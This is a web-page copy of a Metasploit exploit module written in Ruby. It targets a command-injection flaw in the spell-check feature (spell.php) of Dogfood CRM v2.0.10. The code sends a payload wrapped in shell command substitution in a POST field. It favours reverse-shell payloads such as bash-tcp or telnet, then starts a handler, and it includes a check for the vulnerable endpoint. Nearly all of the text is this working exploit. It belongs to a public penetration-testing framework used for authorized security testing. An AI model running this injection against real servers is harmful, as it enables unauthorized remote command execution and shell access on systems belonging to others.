Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/dogfood_spell_exec.rb
19664 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Dogfood CRM spell.php Remote Command Execution',

16
        'Description' => %q{

17
          This module exploits a previously unpublished vulnerability in the

18
          Dogfood CRM mail function which is vulnerable to command injection

19
          in the spell check feature.  Because of character restrictions, this

20
          exploit works best with the double-reverse telnet payload. This

21
          vulnerability was discovered by LSO and affects v2.0.10.

22
        },

23
        'Author' => [

24
          'LSO <lso[at]hushmail.com>', # Exploit module

25
          'aushack', # Added check code, QA tested ok 20090303, there are no references (yet).

26
        ],

27
        'License' => BSD_LICENSE,

28
        'References' => [

29
          [ 'OSVDB', '54707' ],

30
          [ 'URL', 'http://downloads.sourceforge.net/dogfood/' ],

31
        ],

32
        'Privileged' => false,

33
        'Platform' => ['unix'], # aushack - removed win, linux -> untested

34
        'Arch' => ARCH_CMD,

35
        'Payload' => {

36
          'Space' => 1024,

37
          'DisableNops' => true,

38
          'BadChars' => %q|'"`|, # quotes are escaped by PHP's magic_quotes_gpc in a default install

39
          'Compat' =>

40
                        {

41
                          'PayloadType' => 'cmd cmd_bash',

42
                          'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',

43
                        }

44
        },

45
        'Targets' => [ ['Automatic', {}], ],

46
        'DefaultTarget' => 0,

47
        'DisclosureDate' => '2009-03-03',

48
        'Notes' => {

49
          'Reliability' => UNKNOWN_RELIABILITY,

50
          'Stability' => UNKNOWN_STABILITY,

51
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

52
        }

53
      )

54
    )

55


56
    register_options(

57
      [

58
        OptString.new('URIPATH', [ true, "The URI of the spell checker", '/dogfood/mail/spell.php']),

59
      ]

60
    )

61
  end

62


63
  def check

64
    res = send_request_raw(

65
      {

66
        'uri' => normalize_uri(datastore['URIPATH']),

67
      }, 1

68
    )

69


70
    if (res and res.body =~ /Spell Check complete/)

71
      return Exploit::CheckCode::Detected

72
    end

73


74
    return Exploit::CheckCode::Safe

75
  end

76


77
  def exploit

78
    timeout = 1

79


80
    cmd = payload.encoded

81
    data = "data=#{Rex::Text.uri_encode('$( ' + cmd + ' &)x')}"

82
    uri = normalize_uri(datastore['URIPATH'])

83


84
    response = send_request_cgi(

85
      {

86
        'uri' => uri,

87
        'method' => "POST",

88
        'data' => data

89
      },

90
      timeout

91
    )

92


93
    handler

94
  end

95
end

96


97